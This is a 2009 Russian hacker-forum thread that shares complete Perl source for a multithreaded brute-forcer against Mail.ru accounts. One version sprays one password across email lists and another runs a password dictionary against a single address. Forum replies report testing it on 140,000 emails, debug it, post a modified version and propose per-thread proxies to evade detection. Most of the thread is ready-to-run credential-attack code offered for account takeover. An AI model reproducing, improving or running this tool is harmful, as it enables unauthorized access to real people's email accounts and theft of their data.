[PERL]Multithread Mail.ru bruteforce by Sharky

Sharky · 21 Feb 2009

Многопоточный Брутфорс Mail.ru by Sharky

Описание:

[!]Брутит на один пароль по списку мыл ( можно и переделать ) через swa.mail.ru
[!]Многопоточнсть
[!]Высокая скорость брута (сам разгонял до 170 pps )
[!]Не требуются прокси

Редактируем в коде под себя:
Code:
########################################################
$emails   = 'mail.txt';    #Файл с мылами
$good     = 'good.txt';    #Файл с прочеканными гуд акками
$password = '111111';      #Пароль на который брутить
########################################################
$threads = '20';          #Количество потоков
$timeout = '5';            #Таймаут
########################################################
Source:

Лист мыл на один пароль:

PHP:

#!/usr/bin/perl use IO::Socket; use threads; use threads::shared; ######################################################## my @acc : shared; my $i : shared; my $g : shared; my $total : shared; ######################################################## $emails = 'mail.txt'; #Файл с мылами $good = 'good.txt'; #Файл с прочеканными гуд акками $password = '111111'; #Пароль на который брутить ######################################################## $threads = '20'; #Количество потоков $timeout = '5'; #Таймаут ######################################################## $hostname = "swa.mail.ru"; $port = '80'; $path = "/cgi-bin/auth"; ######################################################## open( ACS, "<$emails" ); @acc = acc(); $size = scalar @acc; threads(); sub threads { $g = 0; for ( 0 .. $threads ) { $trl[$_] = threads->create( \&check, $_ ); } for (@trl) { $_->join; } print "Good: $g "; } sub check { while (@acc) { { lock(@acc); $acc = shift @acc; } my ( $mail, $server ) = split( /@/, $acc ); $nn = "\r\n"; my $sock = new IO::Socket::INET( PeerAddr => $hostname, PeerPort => $port, PeerProto => 'tcp', TimeOut => $timeout ); if ( !$sock ) { { lock($i); $i++; } } else { my $data = "action1=Login&Login=$mail&Domain=$server&Password=$password"; my $re = "POST /cgi-bin/auth HTTP/1.0" . $nn . "Host: swa.mail.ru" . $nn . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.7.12) Gecko/20050919 Firefox/1.0.7" . $nn . "Content-type: application/x-www-form-urlencoded" . $nn . "Cache-Control: no-cache" . $nn . "Content-length: " . length($data) . $nn . "Connection: Keep-Alive" . $nn . $nn; print $sock $re; print $sock $data; sysread( $sock, my $answ, 666 ); close $sock; if ( $answ =~ /Location/ ) { { lock($total); $total++; } print "$mail - [OK]\n"; open( FILE, ">>$good" ); print FILE "$acc:$password\n"; close(FILE); $g++; } { lock($i); $i++; } $percent = ( $i / $size ) * 100; $percent = sprintf( "%.0f", $percent ); print "$percent%" . $nn; } } } sub acc { my (@mas); while (<ACS>) { push @mas, $_; } chomp @mas; return @mas; } #with love by Sharky

Одно мыло на лист паролей:

PHP:

#!/usr/bin/perl use IO::Socket; use threads; use threads::shared; ################################################## ###### my @acc : shared; my $i : shared; my $g : shared; my $total : shared; $| = 1; print " ################################################################### ### Sharky Mail.ru brute ### ### Usage mail.pl [email] [passwords.txt] [good.txt] [threads] ### ################################################################### "; ################################################## ###### $email = shift; $pass = shift; $good = shift; ################################################## ###### $threads = shift; $timeout = '5'; #Таймаут ################################################## ###### $hostname = "swa.mail.ru"; $port = '80'; ################################################## ###### print "[+] Loading passwords... \n"; open( ACS, "<$pass" ); @acc = acc(); $size = scalar @acc; print "[+] Loaded $size passwords \n"; threads(); sub threads { print "[+] Start Brute\n\n"; for ( 0 .. $threads ) { $trl[$_] = threads->create( &check, $_ ); } for (@trl) { $_->join; } } sub check { while (@acc) { { lock(@acc); $passw = shift @acc; } my ( $mail, $server ) = split( /@/, $email ); $nn = "\r\n"; my $sock = new IO::Socket::INET( PeerAddr => $hostname, PeerPort => $port, PeerProto => 'tcp', TimeOut => $timeout ); if ( !$sock ) { { lock($i); $i++; } } else { my $data = "action1=Login&Login=$mail&Domain=$server&Password=$passw"; my $re = "POST /cgi-bin/auth HTTP/1.0" . $nn . "Host: swa.mail.ru" . $nn . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.7.12) Gecko/20050919 Firefox/1.0.7" . $nn . "Content-type: application/x-www-form-urlencoded" . $nn . "Cache-Control: no-cache" . $nn . "Content-length: " . length($data) . $nn . "Connection: Keep-Alive" . $nn . $nn; print $sock $re; print $sock $data; sysread( $sock, my $answ, 666 ); close $sock; if ( $answ =~ /Location/ ) { { lock($total); $total++; } print "$email:$passw - [OK]\n"; open( FILE, ">>$good" ); print FILE "$acc:$password\n"; close(FILE); exit; } { lock($i); $i++; } } $percent = ( $i / $size ) * 100; $percent = sprintf( "%.0f", $percent ); print "[%]$percent%\r"; } } sub acc { my (@mas); while (<ACS>) { push @mas, $_; } chomp @mas; return @mas; } #with love by Sharky

Использование одномыльного :
Code:
###################################################################
###                 Sharky Mail.ru brute                        ###
### Usage mail.pl [email] [passwords.txt] [good.txt] [threads]  ###
###################################################################
Либо скачать архивом:
Rapidshare.com
Webfile.ru
Dump.ru

Fess59 · 21 Feb 2009

тестил... база мыл 140к. работает стабильно, только много процентов ну очень много))

N19hTW0lF · 21 Feb 2009

Брутом не занимаюсь.Ну уважаю чела и его работы.+++
(потестил бы ,но перла нету)

Romaxa55 · 21 Feb 2009

Молодец, хороший брутик, ++++++

BuG_4F · 21 Feb 2009

Отлично !!! Многопоточность на красоту

Sharky · 3 Mar 2009

по просьбам трудящихся добавил ещё один для брута одного мыла по словарю паролей

не стал их объединять ибо просто влом

ps Я ВСЕМИРНЫЙ ОБЛОМЩИК ТОРГАШЕЙ

rcc0023 · 3 Mar 2009

Sharky said:

первая версия давно тут лежит вторую написал по просьбам в аську
Click to expand...

А что включает 2я версия?

rcc0023 · 3 Mar 2009

Don1=2, ну так я разве не прав!??!.. Sharky очень хорошо написал.. и очень хорошо поступил...

Sharky · 3 Mar 2009

rcc0023 said:

А что включает 2я версия?
Click to expand...

1 - брут списка мыл по одному паролю
2 - брут одного мыла по списку паролей

Gaus · 3 Mar 2009

Ща буду тестить

Timur111 · 6 Mar 2009

как правильно настроить брут по списку паролей на один E-mail?
Настраивал вроде верно но выбивает сразу после запуска..
Кто поможет,в асю стучите-413190144
заплачу 1$ кто поможет разобраться)

Sharky · 6 Mar 2009

### Usage mail.pl [passwords.txt] [good.txt] [threads] ###

B1t.exe · 8 Mar 2009

C:\brute>mail.pl

################################################## #################
### Sharky Mail.ru brute ###
### Usage mail.pl [passwords.txt] [good.txt] [threads] ###
################################################## #################
[+] Loading passwords...
[+] Loaded 0 passwords
[+] Start Brute

Thread 1 terminated abnormally: Undefined subroutine &main::0 called at C:\brute
\mail.pl line 42.

C:\brute>[/QUOTE]
в чем проблема ? не могу понять !
переименовал файл pass на passwords, ну все равно такая ошибля.
Click to expand...

RegStuff · 9 Mar 2009

Шарке, я вот включил:
Code:
use warnings;
use diagnostics;
и у меня твой релизенг не запустился

De-visible · 9 Mar 2009

Ну по сравнению с реализацией логина, этот брут просто отстой.

nerezus · 9 Mar 2009

Шарке, я вот включил:
use warnings;
use diagnostics;
и у меня твой релизенг не запустился
Click to expand...

"Вот я твой код поменял, а он работать перестал. " ггг )))

Кто будет наезжать на остальных - побаню.

B1t.exe · 10 Mar 2009

а на мой вопрос пока нет решений ?

Tombik · 15 Apr 2009

ребят, разберитесь кто-то, со второй частью скрипта "Одно мыло на лист паролей".... у ТС нет времени на это.

ghostwizard · 16 Apr 2009

Модифицированная версия.
Изменено:
1. Нет ошибки неправильного завершения нити.
2. Вместо процентов теперь плюсики в одну строку. Количество их можно изменить.

Пользуйтесь. Неплохой брут. Как раз узнал про реальное использование нитей в перле.

З.Ы. Форматирование кода ужасное в ачат-редакторе =Q

Есть вариант добавить прокси-поддержку распределенную по нитям. Т.е для каждой нити свой прокси или рандомный по списку, сколько фантазии хватит

Code:

#!/usr/bin/perl -w    

use strict;    
use IO::Socket;  
use threads qw(stringify); 
use threads::shared;  
use POSIX;  ########################################################    
my @acc : shared;  
my $i : shared;  
my $total : shared;  
my $k : shared; 
$| = 1; 
print "
######################################################################  
###                 Sharky Mail.ru brute                           ###  
### Usage mail.pl [email] [passwords.txt] [good.txt] [threads]     ###
### edited by gh0stwizard                                         ###  
######################################################################  
";
########################################################  
my $email = shift;   
my $pass =  shift;  
my $good =  shift;   
my $threads = shift;   
my $timeout = '5';            #Таймаут  
my $hostname = "swa.mail.ru";    
my $port     = '80';  
my ( $mail, $server ) = split( /@/, $email );     
my $nn = "\r\n";  
my $maxplus = 62;     #Количество выводимых плюсов  
########################################################  
my ($passw, $percent);    
########################################################    
print "[+] Loading passwords... \n";   
open( ACS, "<$pass" );   
@acc  = &acc();    
my $size = scalar @acc;    
print "[+] Loaded $size passwords \n";  
print "[+] Start Brute\n\n[";    

my (@trl);    
&threads();  

sub threads {      
 for ( 0 .. $threads )  {          
  $trl[$_] = threads->create( {'void' => 1}, \&check, $_ );          
  $trl[$_]->join();      
  }      
 print "\n[*] Bruteforce has been completed.\n";  
}   

sub check {        
  while (@acc) {            
     { lock(@acc); $passw = shift @acc; }
     my $sock = new IO::Socket::INET(
                PeerAddr  => $hostname,
                PeerPort  => $port, 
                PeerProto => 'tcp',
                TimeOut   => $timeout
            );
            if ( !$sock ) { 
               { lock($i); $i++; }
            }
            else {
                my $data =
                  "action1=Login&Login=$mail&Domain=$server&Password=$passw";
                my $re =
                   "POST /cgi-bin/auth HTTP/1.0"
                   . $nn
                   . "Host: swa.mail.ru"
                   . $nn
                   . "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru-RU; rv:1.7.12) Gecko/20050919 Firefox/1.0.7"
                  . $nn
                  . "Content-type: application/x-www-form-urlencoded"
                  . $nn
                  . "Cache-Control: no-cache"
                  . $nn
                  . "Content-length: "
                  . length($data)
                  . $nn
                  . "Connection: Keep-Alive"
                  . $nn
                  . $nn;
                print $sock $re;
                print $sock $data;
                sysread( $sock, my $answ, 666 );
                close $sock;
                  if ( $answ =~ /Location/ ) {
                    { lock($total); $total++; } 
                   print "]\n[*] $email:$passw - [OK]";
                    open( FILE, ">>$good" );
                    print FILE "$email:$passw\n";
                    close(FILE);
                  print "\n[*] Bruteforce has been completed.\n";
                  exit;
               }
                  { lock($i); $i++; }
          }
          $percent = sprintf("%.6f", ( $i / $size )) * $maxplus;
          my $sh = sprintf("%.6f", (1 / $size)) * $maxplus;
          my $zer = sprintf("%.6f", (1 / $size));
                   if (($percent == $sh) or ($percent == $zer)) {
              print "+"; $k++;
           }
          elsif ( (floor($percent) - 1) == $k ) {
              print "+"; $k++;
          }
          elsif ((floor($percent) -$k) >=2 and ($maxplus>20)) {
              my $def = (floor($percent)) - $k;
              $k += $def;
              print "+"x$def;
          }
          if ($percent == $maxplus) { print "] 100%\r"; }
      }
}

sub acc {
        my (@mas);
        while (<ACS>) {
          push @mas, $_;
        }
        chomp @mas;
        return @mas;
    }
#with love by Sharky

Tombik · 16 Apr 2009

ghostwizard, мои слабые познания, не позволяют разобраться в чём ошибка )))), но явно, чё-то не то...

[PERL]Multithread Mail.ru bruteforce by Sharky

Sharky Elder - Старейшина

Fess59 New Member

N19hTW0lF Elder - Старейшина

Romaxa55 Banned

BuG_4F Member

Sharky Elder - Старейшина

rcc0023 Elder - Старейшина

rcc0023 Elder - Старейшина

Sharky Elder - Старейшина

Gaus Member

Timur111 New Member

Sharky Elder - Старейшина

B1t.exe Elder - Старейшина

RegStuff Banned

De-visible [NDC] Network develope c0ders

nerezus Banned

B1t.exe Elder - Старейшина

Tombik Banned

ghostwizard Member

Tombik Banned

php mail: попадания писем в спам

Useful Searches

[PERL]Multithread Mail.ru bruteforce by Sharky

Sharky Elder - Старейшина

Fess59 New Member

N19hTW0lF Elder - Старейшина

Romaxa55 Banned

BuG_4F Member

Sharky Elder - Старейшина

rcc0023 Elder - Старейшина

rcc0023 Elder - Старейшина

Sharky Elder - Старейшина

Gaus Member

Timur111 New Member

Sharky Elder - Старейшина

B1t.exe Elder - Старейшина

RegStuff Banned

De-visible [NDC] Network develope c0ders

nerezus Banned

B1t.exe Elder - Старейшина

Tombik Banned

ghostwizard Member

Tombik Banned

php mail: попадания писем в спам